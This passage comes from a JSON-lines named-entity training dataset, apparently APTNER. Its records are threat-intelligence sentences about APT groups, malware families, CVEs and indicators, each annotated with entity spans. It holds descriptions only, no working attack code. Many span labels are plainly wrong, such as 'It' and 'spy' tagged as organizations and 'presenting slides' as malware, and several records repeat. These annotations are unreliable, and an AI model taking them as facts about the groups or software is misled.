This mode of operation is typical of many hacker groups—and especially of Winnti .", "spans": {"Organization: Winnti": [[4, 10], [129, 135]], "Organization: hacker": [[97, 103]]}, "info": {"id": "aptner_train_005572", "source": "aptner_train"}} {"text": "By 2014 , the Winnti malware code was no longer limited to game manufacturers . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Winnti is attacking companies in Japan , France , the U.S. and Germany . The Winnti hackers broke into Henkel’s network in 2014 . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . The hackers behind Winnti have also set their sights on Japan’s biggest chemical company , Shin-Etsu Chemical . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . Winnti hackers also penetrated the BASF and Siemens networks . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . 
To witnesses , the spy appears to be running a program showing videos , presenting slides ( Prezi ) , playing a computer game or even running a fake virus scanner .", "spans": {"Organization: Winnti": [[14, 20], [80, 86], [171, 177], [248, 254], [321, 327], [543, 549], [760, 766], [832, 838], [1004, 1010], [1032, 1038], [605, 611]], "Organization: game manufacturers": [[59, 77]], "Organization: high-tech companies": [[100, 119]], "Organization: pharmaceutical companies": [[144, 168]], "Organization: Henkel’s": [[274, 282]], "Organization: Henkel": [[301, 307], [498, 504]], "Organization: chemical company": [[658, 674]], "Organization: Shin-Etsu Chemical": [[677, 695]], "Organization: Sumitomo Electric": [[740, 757]], "Organization: BASF": [[867, 871]], "Organization: Siemens": [[876, 883]], "Organization: networks": [[884, 892]], "Organization: Bayer pharmaceutical": [[958, 978]], "Organization: Gameforge": [[1016, 1025]], "System: Windows": [[1120, 1127]], "Organization: spy": [[1186, 1189]], "Malware: presenting slides": [[1239, 1256]], "Malware: Prezi": [[1259, 1264]]}, "info": {"id": "aptner_train_005576", "source": "aptner_train"}} {"text": "Group-IB specialists have established that the aim of the attack was to deliver and launch the second stage of Silence’s Trojan , known as Silence.MainModule .", "spans": {"Organization: Group-IB": [[0, 8]], "Organization: Silence’s": [[111, 120]], "Malware: Trojan": [[121, 127]], "Malware: Silence.MainModule": [[139, 157]]}, "info": {"id": "aptner_train_005592", "source": "aptner_train"}} {"text": "Silence attacked financial organisations in the UK . Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software . The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks . 
On 24 March 2019 , Silence.ProxyBot ( MD5 2fe01a04d6beef14555b2cf9a717615c ) was uploaded to VirusTotal from an IP address in Sri Lanka . On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign . Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk . On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 .", "spans": {"Organization: Silence": [[0, 7], [53, 60], [821, 828], [1000, 1007], [1209, 1216], [1401, 1408]], "Organization: financial": [[17, 26], [607, 616]], "Organization: attackers": [[304, 313]], "Organization: banks": [[399, 404]], "Malware: Silence.ProxyBot": [[426, 442]], "Indicator: 2fe01a04d6beef14555b2cf9a717615c": [[449, 481]], "System: VirusTotal": [[500, 510]], "System: emails": [[589, 595], [1427, 1433]], "Organization: Group-IB": [[667, 675]], "Organization: bank": [[878, 882]], "Malware: Atmosphere": [[965, 975]], "Malware: Trojan": [[980, 986]], "Indicator: xfs-disp.exe": [[1073, 1085]], "Organization: Bank": [[1140, 1144]], "Organization: Silence:": [[1166, 1174]], "Organization: Financial": [[1507, 1516]]}, "info": {"id": "aptner_train_005593", "source": "aptner_train"}} {"text": "TA505 is also using FlowerPippi ( 
Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morocco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol ( SMTP ) credentials and email addresses in the victim’s machine . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . 
The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer” part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd” and exit.exe” files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe” file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . 
In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": {"Organization: TA505": [[0, 5], [177, 182], [431, 436], [1895, 1900], [2208, 2213], [2336, 2341], [2563, 2568], [2713, 2718]], "Malware: FlowerPippi": [[20, 31], [2004, 2015]], "Malware: Backdoor.Win32.FLOWERPIPPI.A": [[34, 62]], "Malware: backdoor": [[73, 81]], "System: emails": [[286, 292], [653, 659], [921, 927], [1283, 1289], [1402, 1408]], "Organization: It": [[335, 337], [699, 701]], "Malware: FlawedAmmyy payload": [[409, 428], [1116, 1135]], "Malware: Wizard (.wiz) files": [[442, 461]], "Malware: FlawedAmmyy RAT": [[486, 501]], "Organization: TA505’s": [[545, 552]], "Malware: Amadey botnet": [[683, 696]], "Malware: EmailStealer": [[747, 759]], "System: email": [[830, 835], [2032, 2037], [2912, 2917]], "System: .HTML": [[1057, 1062]], "System: Excel/Word": [[1080, 1090]], "Malware: macro": [[1104, 1109]], "Malware: Amadey": [[1142, 1148]], "Indicator: ServHelper": [[1217, 1227]], "Indicator: spam emails": [[1462, 1473]], "Organization: banks": [[1538, 1543]], "Organization: Proofpoint": [[1648, 1658]], "Organization: AndroMut": [[1684, 1692]], "Indicator: Gelup": [[1853, 1858]], "Organization: ZLAB": [[2094, 2098]], "Organization: high profile companies": [[2457, 2479]], "Malware: remote administration tool": [[2639, 2665]], "Organization: Banking": [[2818, 2825]], "Organization: Retail": [[2830, 2836]], "Indicator: i.cmd”": [[3036, 3042]], "Indicator: exit.exe”": [[3047, 3056]], "Indicator: rtegre.exe”": [[3150, 3161]], "Indicator: veter1605_MAPS_10cr0.exe”": [[3170, 3195]], "Organization: Kaspersky": [[3213, 3222]], "Organization: Turla": [[3263, 3268], [3343, 3348], [3481, 3486], [3670, 3675], [3768, 3773]], "Malware: PowerShell loader": [[3269, 3286]], "Organization: military": [[3443, 3451]], "System: PowerShell": [[3496, 3506], [3800, 3810]], "System: Antimalware Scan Interface": [[3842, 
3868]], "System: AMSI": [[3871, 3875]]}, "info": {"id": "aptner_train_005599", "source": "aptner_train"}} {"text": "It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . Waterbug also used an older version of PowerShell , likely to avoid logging . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . The malware then uses WebDAV to upload the RAR archive to a Box account .", "spans": {"Organization: Microsoft": [[25, 34]], "Malware: PsExec tool": [[93, 104]], "Organization: Waterbug": [[107, 115], [213, 221]], "System: PowerShell": [[146, 156]], "Malware: USB stealer": [[229, 240]], "Indicator: malware": [[326, 333]], "Malware: WebDAV": [[344, 350]], "Indicator: RAR archive": [[365, 376]]}, "info": {"id": "aptner_train_005601", "source": "aptner_train"}} {"text": "The DeepSight Managed Adversary and Threat Intelligence team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug ( aka Turla ) Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug Cyber Espionage group , and methods of detecting and thwarting activities of this adversary . While reviewing a 2015 report⁵ of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti⁶ samples designed specifically for Linux⁷ . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Distinct changes to Azazel by the Winnti developers include the addition of a function named ‘Decrypt2’ , which is used to decode an embedded configuration similar to the core implant . 
Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . We will see more from Zebrocy into 2019 on government and military related organizations . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . Kaspersky reveals that APT33 is a capable group that has carried out Cyber Espionage operations since at least 2013 . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The Cyber Espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . 
FireEye assesses that APT32 leverages a unique suite of fully-featured malware . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam’s manufacturing , consumer products , and hospitality sectors . The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . FireEye assesses that APT32 is a Cyber Espionage group aligned with Vietnamese government interests . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . APT10 is a Chinese Cyber Espionage group that FireEye has tracked since 2009 . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . FireEye’s visibility into the operations of APT28 – a group we believe the Russian government sponsors – has given us insight into some of the government’s targets , as well as its objectives and the activities designed to further them . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . 
Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack .", "spans": {"Organization: DeepSight Managed Adversary": [[4, 31]], "Organization: Threat Intelligence": [[36, 55]], "Organization: Waterbug": [[203, 211], [483, 491]], "Organization: Turla": [[218, 223]], "Organization: DeepSight MATI team": [[324, 343]], "Organization: Winnti": [[622, 628], [874, 880]], "Organization: Vietnamese gaming company": [[644, 669]], "Organization: Winnti⁶": [[705, 712]], "Organization: Chronicle": [[782, 791]], "Malware: Azazel": [[917, 923]], "Organization: Winnti developers": [[931, 948]], "Organization: Zebrocy": [[1083, 1090], [1253, 1260]], "Vulnerability: 0day": [[1215, 1219]], "Vulnerability: exploits": [[1220, 1228]], "Organization: government": [[1274, 1284], [3495, 3505]], "Organization: military": [[1289, 1297]], "Malware: PowerShell script": [[1326, 1343]], "Indicator: malicious DLL files": [[1403, 1422]], "Organization: Silence": [[1465, 1472]], "Malware: Perl IRC bot": [[1506, 1518]], "Malware: public IRC": [[1523, 1533]], "Organization: FBI": [[1566, 1569]], "Organization: APT6": [[1622, 1626]], "Organization: US government": [[1639, 1652]], "Organization: \bFireEye iSIGHT": [[1727, 1742]], "Organization: APT37": [[1770, 1775]], "Organization: Scarcruft": [[1826, 1835]], "Organization: Group123": [[1840, 1848]], "Organization: \bTrend Micro": [[1851, 1863]], "Organization: MuddyWater": [[1892, 1902]], "Organization: actor": [[1919, 1924]], "Organization: \bFireEye": [[1972, 1980]], "Organization: actors": [[1997, 2003]], "System: Flash": [[2026, 2031], [4599, 4604]], "Organization: TEMP.Reaper": [[2088, 2099]], "Organization: FireEye": [[2102, 2109], [2249, 2256], [3018, 3025], [3099, 3106], [3259, 3266], [3416, 3423], [3541, 3548], [3749, 3756], [4155, 4162], [4312, 4319]], "Organization: TEMP.Hermit": [[2174, 2185]], 
"Organization: APT34": [[2266, 2271]], "Vulnerability: exploit": [[2281, 2288]], "Organization: Microsoft": [[2297, 2306], [4528, 4537]], "Vulnerability: vulnerability": [[2314, 2327]], "Organization: government organization": [[2340, 2363]], "Organization: Kaspersky": [[2385, 2394], [2532, 2541], [2918, 2927]], "Organization: APT33": [[2408, 2413], [2503, 2508]], "Malware: DROPSHOT dropper": [[2563, 2579]], "Organization: APT32": [[2608, 2613], [2697, 2702], [3120, 3125], [3397, 3402], [3438, 3443]], "Malware: backdoors": [[2639, 2648]], "Malware: scripts": [[2653, 2660]], "Organization: Mandiant": [[2776, 2784], [3370, 3378]], "Organization: FIN7": [[2898, 2902]], "Organization: Carbanak": [[2990, 2998]], "Organization: Vietnam’s manufacturing": [[3183, 3206]], "Organization: consumer products": [[3209, 3226]], "Organization: hospitality": [[3233, 3244]], "Organization: iSIGHT": [[3267, 3273]], "Organization: Vietnamese": [[3484, 3494]], "Organization: APT19": [[3583, 3588]], "Organization: Chinese government": [[3682, 3700]], "Organization: APT10": [[3703, 3708], [3858, 3863]], "Organization: FireEye ISIGHT Intelligence": [[3817, 3844]], "Organization: FireEye’s": [[3917, 3926]], "Organization: APT28": [[3961, 3966], [4188, 4193], [4586, 4591]], "Organization: Russian government": [[3992, 4010]], "Organization: APT30": [[4355, 4360]], "Organization: FireEye iSIGHT": [[4402, 4416]], "Organization: Vendetta Brothers": [[4497, 4514]], "Organization: Google": [[4517, 4523]], "Vulnerability: CVE-2016-7855": [[4619, 4632]]}, "info": {"id": "aptner_train_005602", "source": "aptner_train"}} {"text": "The initial indicator of the attack was a malicious Web shell that was detected on an IIS server , coming out of the w3wp.exe process .", "spans": {"System: Web shell": [[52, 61]], "System: IIS": [[86, 89]], "Indicator: w3wp.exe": [[117, 125]]}, "info": {"id": "aptner_train_005609", "source": "aptner_train"}} {"text": "The malware may inject itself into browser processes 
and explorer.exe .", "spans": {"Malware: malware": [[4, 11]], "Indicator: explorer.exe": [[57, 69]]}, "info": {"id": "aptner_train_005611", "source": "aptner_train"}} {"text": "The samples we identified target the ATM vendor Diebold .", "spans": {"Indicator: samples": [[4, 11]], "Organization: ATM vendor Diebold": [[37, 55]]}, "info": {"id": "aptner_train_005649", "source": "aptner_train"}} {"text": "There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": {"Indicator: winword.exe": [[86, 97]], "Indicator: Start-Process": [[116, 129]], "Indicator: cmdlet": [[130, 136]]}, "info": {"id": "aptner_train_005657", "source": "aptner_train"}} {"text": "One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": {"Indicator: ipv4.dll": [[14, 22]], "Malware: downloader": [[79, 89]]}, "info": {"id": "aptner_train_005660", "source": "aptner_train"}} {"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_005684", "source": "aptner_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_005690", "source": "aptner_train"}} {"text": "These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": {"System: emails": [[6, 12]], "System: HTML Application": [[70, 86]], "System: HTA": [[89, 92]]}, "info": {"id": "aptner_train_005699", "source": "aptner_train"}} {"text": "Upon successful exploitation , the attachment will install the Trojan known as NetTraveler 
using a DLL side-loading attack technique .", "spans": {"Indicator: attachment": [[35, 45]], "Malware: Trojan": [[63, 69]], "Malware: NetTraveler": [[79, 90]], "Indicator: DLL side-loading": [[99, 115]]}, "info": {"id": "aptner_train_005800", "source": "aptner_train"}} {"text": "this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"System: RTF": [[5, 8]], "Vulnerability: CVE-2017-1882": [[28, 41]], "Indicator: eqnedt32.exe": [[45, 57]]}, "info": {"id": "aptner_train_005838", "source": "aptner_train"}} {"text": "This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"System: Python": [[14, 20]], "Indicator: Stageless Meterpreter": [[45, 66]], "Indicator: Ext_server_stdapi.x64.dll”": [[75, 101]], "Indicator: Ext_server_extapi.x64.dll”": [[104, 130]], "Indicator: Ext_server_espia.x64.dll”": [[137, 162]]}, "info": {"id": "aptner_train_005883", "source": "aptner_train"}} {"text": "we identified two methods to deliver the KerrDown downloader to targets .", "spans": {"Indicator: KerrDown": [[41, 49]]}, "info": {"id": "aptner_train_005886", "source": "aptner_train"}} {"text": "we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems .", "spans": {"Indicator: SEDNIT": [[112, 118]], "Organization: Microsoft": [[145, 154]]}, "info": {"id": "aptner_train_005910", "source": "aptner_train"}} {"text": "These campaign-related VPSs are located in South Africa . 
The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": {"Organization: VPSs": [[23, 27]], "Indicator: Trojan": [[91, 97]]}, "info": {"id": "aptner_train_005927", "source": "aptner_train"}} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": {"System: PowerShell": [[4, 14]], "Malware: Trojan": [[30, 36]]}, "info": {"id": "aptner_train_005928", "source": "aptner_train"}} {"text": "China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": {"Indicator: China Chopper": [[0, 13]], "System: Virtual Terminal": [[40, 56]]}, "info": {"id": "aptner_train_005937", "source": "aptner_train"}} {"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[125, 145]]}, "info": {"id": "aptner_train_005951", "source": "aptner_train"}} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]]}, "info": {"id": "aptner_train_005952", "source": "aptner_train"}} {"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_006006", "source": "aptner_train"}} {"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_006069", 
"source": "aptner_train"}} {"text": "This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"Organization: diplomats": [[19, 28]], "Organization: journalists": [[124, 135]]}, "info": {"id": "aptner_train_006093", "source": "aptner_train"}} {"text": "Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[125, 145]]}, "info": {"id": "aptner_train_006108", "source": "aptner_train"}} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]]}, "info": {"id": "aptner_train_006109", "source": "aptner_train"}} {"text": "On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: actors": [[31, 37]], "Organization: individual": [[72, 82]]}, "info": {"id": "aptner_train_006163", "source": "aptner_train"}} {"text": "LEAD and Barium are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time .", "spans": {"Organization: Barium": [[9, 15]], "Organization: SOC personnel": [[86, 99]]}, "info": {"id": "aptner_train_006226", "source": "aptner_train"}} {"text": "This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"Organization: diplomats": [[19, 28]], "Organization: journalists": [[124, 135]]}, "info": {"id": "aptner_train_006250", "source": "aptner_train"}} {"text": "It is possible that CVE-2017-8759 was being used by additional actors .", "spans": {"Vulnerability: CVE-2017-8759": [[20, 33]], 
"Organization: actors": [[63, 69]]}, "info": {"id": "aptner_train_006268", "source": "aptner_train"}} {"text": "The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"Vulnerability: exploit": [[25, 32]], "Vulnerability: EternalBlue": [[45, 56]], "Organization: Shadow Brokers": [[84, 98]]}, "info": {"id": "aptner_train_006271", "source": "aptner_train"}} {"text": "Some hackers even went onto use the Cisco exploits in the wild .", "spans": {"Organization: Cisco": [[36, 41]], "Vulnerability: exploits": [[42, 50]]}, "info": {"id": "aptner_train_006272", "source": "aptner_train"}} {"text": "The Word document usually exploits CVE-2012-0158 .", "spans": {"System: Word": [[4, 8]], "Vulnerability: CVE-2012-0158": [[35, 48]]}, "info": {"id": "aptner_train_006281", "source": "aptner_train"}} {"text": "The Word document usually exploits CVE-2012-0158 .", "spans": {"System: Word": [[4, 8]], "Vulnerability: CVE-2012-0158": [[35, 48]]}, "info": {"id": "aptner_train_006297", "source": "aptner_train"}} {"text": "The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": {"Vulnerability: zero-day": [[37, 45]], "Vulnerability: CVE-2018-0802": [[62, 75]]}, "info": {"id": "aptner_train_006321", "source": "aptner_train"}} {"text": "APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": {"Organization: APT28": [[0, 5]], "Vulnerability: EternalBlue": [[46, 57]], "Vulnerability: exploits": [[58, 66]], "Malware: open source tool": [[75, 91]], "Malware: Responder": [[92, 101]]}, "info": {"id": "aptner_train_006339", "source": "aptner_train"}} {"text": "Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"Indicator: Documents": [[0, 
9]], "System: flash": [[19, 24]], "Vulnerability: exploit": [[25, 32], [94, 101]], "System: VirusTotal": [[105, 115]]}, "info": {"id": "aptner_train_006378", "source": "aptner_train"}} {"text": "The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"Vulnerability: EternalBlue": [[4, 15]], "Vulnerability: exploits": [[16, 24]], "Malware: Petya": [[138, 143]], "Malware: NotPetya": [[146, 154]]}, "info": {"id": "aptner_train_006385", "source": "aptner_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"Indicator: documents": [[12, 21]], "Vulnerability: CVE-2017-0199": [[32, 45]]}, "info": {"id": "aptner_train_006389", "source": "aptner_train"}} {"text": "The documents that exploit CVE-2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"Vulnerability: exploit": [[19, 26]], "Vulnerability: CVE-2017-11882": [[27, 41]], "System: HTML Application": [[72, 88]], "System: HTA": [[91, 94]], "System: Visual Basic": [[121, 133]], "System: VBS": [[136, 139]], "Indicator: mshta.exe": [[224, 233]]}, "info": {"id": "aptner_train_006449", "source": "aptner_train"}} {"text": "Earlier this month , Securelist 's technology caught another zero-day exploits deployed in targeted attacks .", "spans": {"Organization: Securelist": [[21, 31]], "Vulnerability: zero-day": [[61, 69]]}, "info": {"id": "aptner_train_006466", "source": "aptner_train"}} {"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploits deployed in targeted attacks .", "spans": {"Vulnerability: zero-day": [[39, 47]], "System: Adobe Flash Player": [[48, 66]]}, "info": {"id": "aptner_train_006474", "source": "aptner_train"}} {"text": "Another set of attacks 
called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"System: flash": [[65, 70]], "Vulnerability: exploit": [[71, 78]], "Vulnerability: CVE-2016-4117": [[81, 94]]}, "info": {"id": "aptner_train_006481", "source": "aptner_train"}} {"text": "One vulnerability is a Windows zero-day vulnerability ( CVE-2019-0703 ) discovered by Symantec . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers .", "spans": {"System: Windows": [[23, 30], [119, 126]], "Vulnerability: zero-day": [[31, 39]], "Vulnerability: CVE-2019-0703": [[56, 69]], "Organization: Symantec": [[86, 94]], "Organization: Bemstour": [[97, 105]], "Vulnerability: vulnerabilities": [[127, 142]]}, "info": {"id": "aptner_train_006489", "source": "aptner_train"}} {"text": "The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak .", "spans": {"System: Windows": [[11, 18]], "Vulnerability: exploit": [[126, 133]], "Organization: Shadow Brokers": [[213, 227]]}, "info": {"id": "aptner_train_006490", "source": "aptner_train"}} {"text": "The zero-day vulnerability found and reported by Symantec CVE-2019-0703 occurs due to the ACT the Windows SMB Server handles certain requests .", "spans": {"Vulnerability: zero-day": [[4, 12]], "Organization: Symantec": [[49, 57]], "Vulnerability: CVE-2019-0703": [[58, 71]], "System: Windows": [[98, 105]]}, "info": {"id": "aptner_train_006492", "source": "aptner_train"}} {"text": "this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"System: RTF": [[5, 8]], "Vulnerability: CVE-2017-1882": [[28, 41]], "Indicator: eqnedt32.exe": [[45, 57]]}, "info": {"id": "aptner_train_006494", "source": "aptner_train"}} {"text": "OSX Malware Linked to 
Operation Emmental Hijacks User Network Traffic .", "spans": {"System: OSX": [[0, 3]], "Malware: Malware": [[4, 11]]}, "info": {"id": "aptner_train_006522", "source": "aptner_train"}} {"text": "The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple ’s OS X operating system .", "spans": {"Malware: OSX_DOK": [[4, 11]], "Malware: malware": [[12, 19]], "Organization: Trend Micro": [[34, 45]], "Malware: OSX_DOK.C": [[49, 58]], "System: Apple ’s OS X": [[178, 191]]}, "info": {"id": "aptner_train_006523", "source": "aptner_train"}} {"text": "This malware , which specifically targets Swiss banking users , uses a phishing campaign to drop its payload , which eventually results in the hijacking of a user ’s network traffic using a Man-in-the-Middle ( MitM ) attack .", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006524", "source": "aptner_train"}} {"text": "OSX_DOK.C seems to be another version of WERDLOD ( Detected by Trend Micro as TROJ_WERDLOD Family ) , which is a malware that was used during the Operation Emmental campaigns—an interesting development that we will tackle further in this blog post .", "spans": {"Malware: OSX_DOK.C": [[0, 9]], "Malware: WERDLOD": [[41, 48]], "Organization: Trend Micro": [[63, 74]], "Malware: TROJ_WERDLOD Family": [[78, 97]]}, "info": {"id": "aptner_train_006525", "source": "aptner_train"}} {"text": "OSX_DOK.C first arrives via a phishing email that contains certain files labeled as either .zip or .docx files .", "spans": {"Malware: OSX_DOK.C": [[0, 9]], "Indicator: phishing email": [[30, 44]]}, "info": {"id": 